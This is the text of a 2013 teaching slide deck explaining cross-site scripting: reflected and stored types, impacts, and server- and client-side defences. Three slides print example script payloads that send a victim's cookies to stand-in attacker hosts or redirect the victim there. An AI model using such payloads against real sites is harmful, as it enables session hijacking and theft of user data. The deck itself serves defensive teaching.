2. OVERVIEW
CROSS-SITE SCRIPTING
XSS (-ve) effects
Cross Site Scripting Types
Who is affected by XSS?
Impact of XSS-Attacks
Summary
12/15/2013
2
3. CROSS-SITE SCRIPTING (XSS)
Cross-site scripting or XSS is a defined as a
computer security vulnerability (weakness) found in
web applications.
XSS allows for code injection by malicious web users
into Internet pages viewed by other users.
In an XSS attack, the attacker gains the ability to see
private user IDs, passwords, credit card information
and other personal identification.
12/15/2013
3
4. XSS (-ve) effects
stealing other user’s cookies
stealing their private information
performing actions on behalf of other users
redirecting to other websites
Showing ads in hidden IFRAMES and popups
12/15/2013
4
5. Cross Site Scripting Types
Two known types:
Reflected (Non-Persistent)
• Link in other website or email
12/15/2013
Stored (Persistent)
• Forum, bulletin board, feedback form
5
6. Reflected (Non-persistent)…
The Reflected Cross-Site Scripting vulnerability is by far the most common
and well-known type. These holes show up when data provided by a web client is
used immediately by server-side scripts to generate a page of results for that
user. If unvalidated user-supplied data is included in the resulting page without
HTML encoding, this will allow client-side code to be injected into the dynamic
page. A classic example of this is in site search engines: if one searches for a
string which includes some HTML special characters, often the search string
will be redisplayed on the result page to indicate what was searched for, or will
at least include the search terms in the text box for easier editing. If all
occurrences of the search terms are not HTML entity encoded, an XSS hole will
result.
12/15/2013
6
7. 1
Send e-mail with <script> tags embedded in
the link.
http://mybank.com/
account.php?variable=”><script>document.lo
cation=’http://www.badguy.com/cgi-bin/
cookie.cgi’”%20+document.cookie</script>
Follows link and the script executes
2
www.badguy.com
Cookie collector
Malicious content dose not get stored in the server
The server bounces the original input to the victim without modification
12/15/2013
7
8. stored (persistent)….
In persistent type of XSS attack, XSS code gets saved into persistent storage like
database with other data and then it is visible to other users also. One example of this kind
of attacks is possible blog websites, where hacker can add their XSS code along with the
comment text and if no validation or filtering is present on the server, XSS code can
successfully saved into the database. After this if anyone (other users) open the page into
their browsers, XSS code can execute and can perform a variety of harmful actions. This
type of attack is more vulnerable, because Hacker can steal cookies and can make
modifications in the page. The risk with these kinds of attacks is any third party hacker can
use this vulnerability to perform some actions on behalf of other users.
see original post<script>window.location =
"http://www.hackers.com?yid=";</script>
12/15/2013
8
9. Public forum web site
1
Great message!
<script>
var img=new Image();
img.src=
"http://www.bad.com/CookieStealer/
Form1.aspx?s= "+document.cookie;
</script>
2
Downlaod
malicious code
Upload malicious scripting commands to
the public forum
Browse
Attacker
3
Victim
The server stores the malicious content
The server serves the malicious content in its original form
12/15/2013
9
10. Who is affected by XSS?
XSS attack’s first target is the Client
Client trusts server (Does not expect attack)
Browser executes malicious script
But second target = Company running the Server
Loss of public image (Blame)
Loss of customer trust
Loss of money
12/15/2013
10
11. Impact of XSS-Attacks
Access to authentication credentials for Web application
Cookies, Username and Password
Normal users
Access to personal data (Credit card, Bank Account)
Access to business data (Bid details, construction details)
Misuse account (order expensive goods)
High privileged users
Control over Web application
Control/Access: Web server machine
Control/Access: Backend / Database systems
12/15/2013
11
12. Clint side
•Cookie Security
•Verify email
•Always update
Server side
•Input validation (Black listing VS White listing)
•Encode all meta characters send to the client
•keep track of user sessions
•Web application firewall
•Always test
12/15/2013
12
13. Summary
Cross-Site Scripting is extremly dangerous
Identity theft, Impersonation
Cause: Missing or in-sufficient input validation
XSS-Prevention Best Practices
Implement XSS-Prevention in application
Do not trust client side validation
Check and validate all input before processing
Do not echo any input value without validation
12/15/2013
13